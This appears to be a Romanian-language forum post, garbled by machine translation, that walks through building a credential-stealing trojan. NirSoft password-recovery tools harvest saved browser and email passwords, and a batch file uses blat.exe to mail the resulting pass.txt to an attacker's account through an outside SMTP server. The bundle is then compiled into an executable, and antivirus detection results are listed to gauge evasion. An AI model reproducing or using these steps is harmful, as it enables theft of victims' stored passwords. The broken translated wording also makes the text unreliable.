NirSoft de recuperare a parolei de la distanță
Ho-ho)) Și iată-mă aici)Toți au auzit despre troian improvizat create de program la mai multe Parola de recuperare a parolei de recuperare locală.
Este greoaie, detectat de către software-ul antivirus, trăgând o mulțime de prisos și trimite jurnalele nu sunt în format text, care este uneori foarte necesar.
Și am început să caute diferite instrumente cu funcționalitate similară, cu suport pentru start-up cu parametrii sau care rulează în fundal.
Multe dintre ele, toate, mai devreme sau mai târziu va spune, dar acum ne vom uita la un set de programe de NirSoft:
- ChromePass - Google Chrome Recuperarea parolei
- iepv - pentru a recupera parolele IE
- mailpv - pentru a recupera parolele programelor de e-mail populare (Outlook, Thunderbird, etc.)
- OperaPassView - pentru a recupera parolele Opera
- PasswordFox - pentru a restabili parole Firefox
Avem nevoie de programul menționat mai sus, un fișier batch, al cărui conținut va fi descris mai jos și convertor liliecilor 2 convertor exe. Toate bune pe care le puteți descărca această arhivă.
Mirror.
Și astfel, start.bat deschis:
blat.exe -install -Server smtp.mail.ru -port 25 -f LOGIN @ mail.ru -u -pw INTRARE PAROLA
blat.exe -sa LOGIN @ mail.ru -subject "Mesaj Subiect" -attachi "pass.txt" "corpul mesajului"-corp
Este gata pentru a merge, trebuie doar să înlocuiți datele de autentificare și parola pe cont propriu, să indice subiectul și textul din corpul mesajului.
Apoi deschideți Bat_To_Exe_Converter.
În fișier batch linie, specificați calea către fișierul batch, numele fișierului de ieșire, a pus o bifă după cum se arată, și trece la o altă filă - Includeți
Adăugați la lista tuturor fișierelor din dosarul Include
Și apăsați butonul Compile.
Nostru troian gata. fișier de ieșire Greutate am obține aproximativ 352 kb.
Ansamblul poate fi adăugat și alte utilități pentru a recupera date dintr-o varietate de site-ul programe nirsoft.net.
Antivirus palitsya această economie, dar nu este totul. Dacă începe să se toarnă în chekkery online, apoi începe palitsya mai puternic.
AVG Free - cal troian PSW.Generic8.BKAW.dropper
Avast - Win32: PSWtool-E [PUP]
F-Secure - Dropped: Application.NirSoft.ChromePassView
G Data - Dropped: Application.NirSoft.ChromePassView.C (Motor-A)
IKARUS de securitate - nu-o-virus: PSWTool.Win32.NetPass
MS Security Essentials - HackTool: Win32 / PassView
Norman - W32 / Suspicious_Gen2.ERFKQ.dropper
În cazul în care rapoartele nu vin, poate doriți să schimbați e-mail sau portul SMTP.
Doar construi firewall-uri detectate, proaktivkami și Task Manager)
Un pic mai bine. Primul lot fișier un bug în codul
În al doilea rând antivirus (SSE) nu vrea să rateze o compilație a troian, și apoi lăsați-l timp de aproximativ 21 kb, este necesar să se stingă.
Al treilea nu funcționează. Windows 7, Antivir și firewall dezactivat, setările din Bat la exe Offtop
(Ultimele 2 căpușe pus, gândindu-se că acest lucru ne va salva de la faptul că virusul nu se execută)
UPD: În mod ciudat, nu beysya funcționează. Aici este un cod de ecran și fișierul în sine: Offtopic
Text ascuns (Trebuie să vă introduceți datele de autentificare sau înregistrare și au un mesaj (e) 200):
Nu aveți drepturi pentru a vedea textul ascuns conținute aici.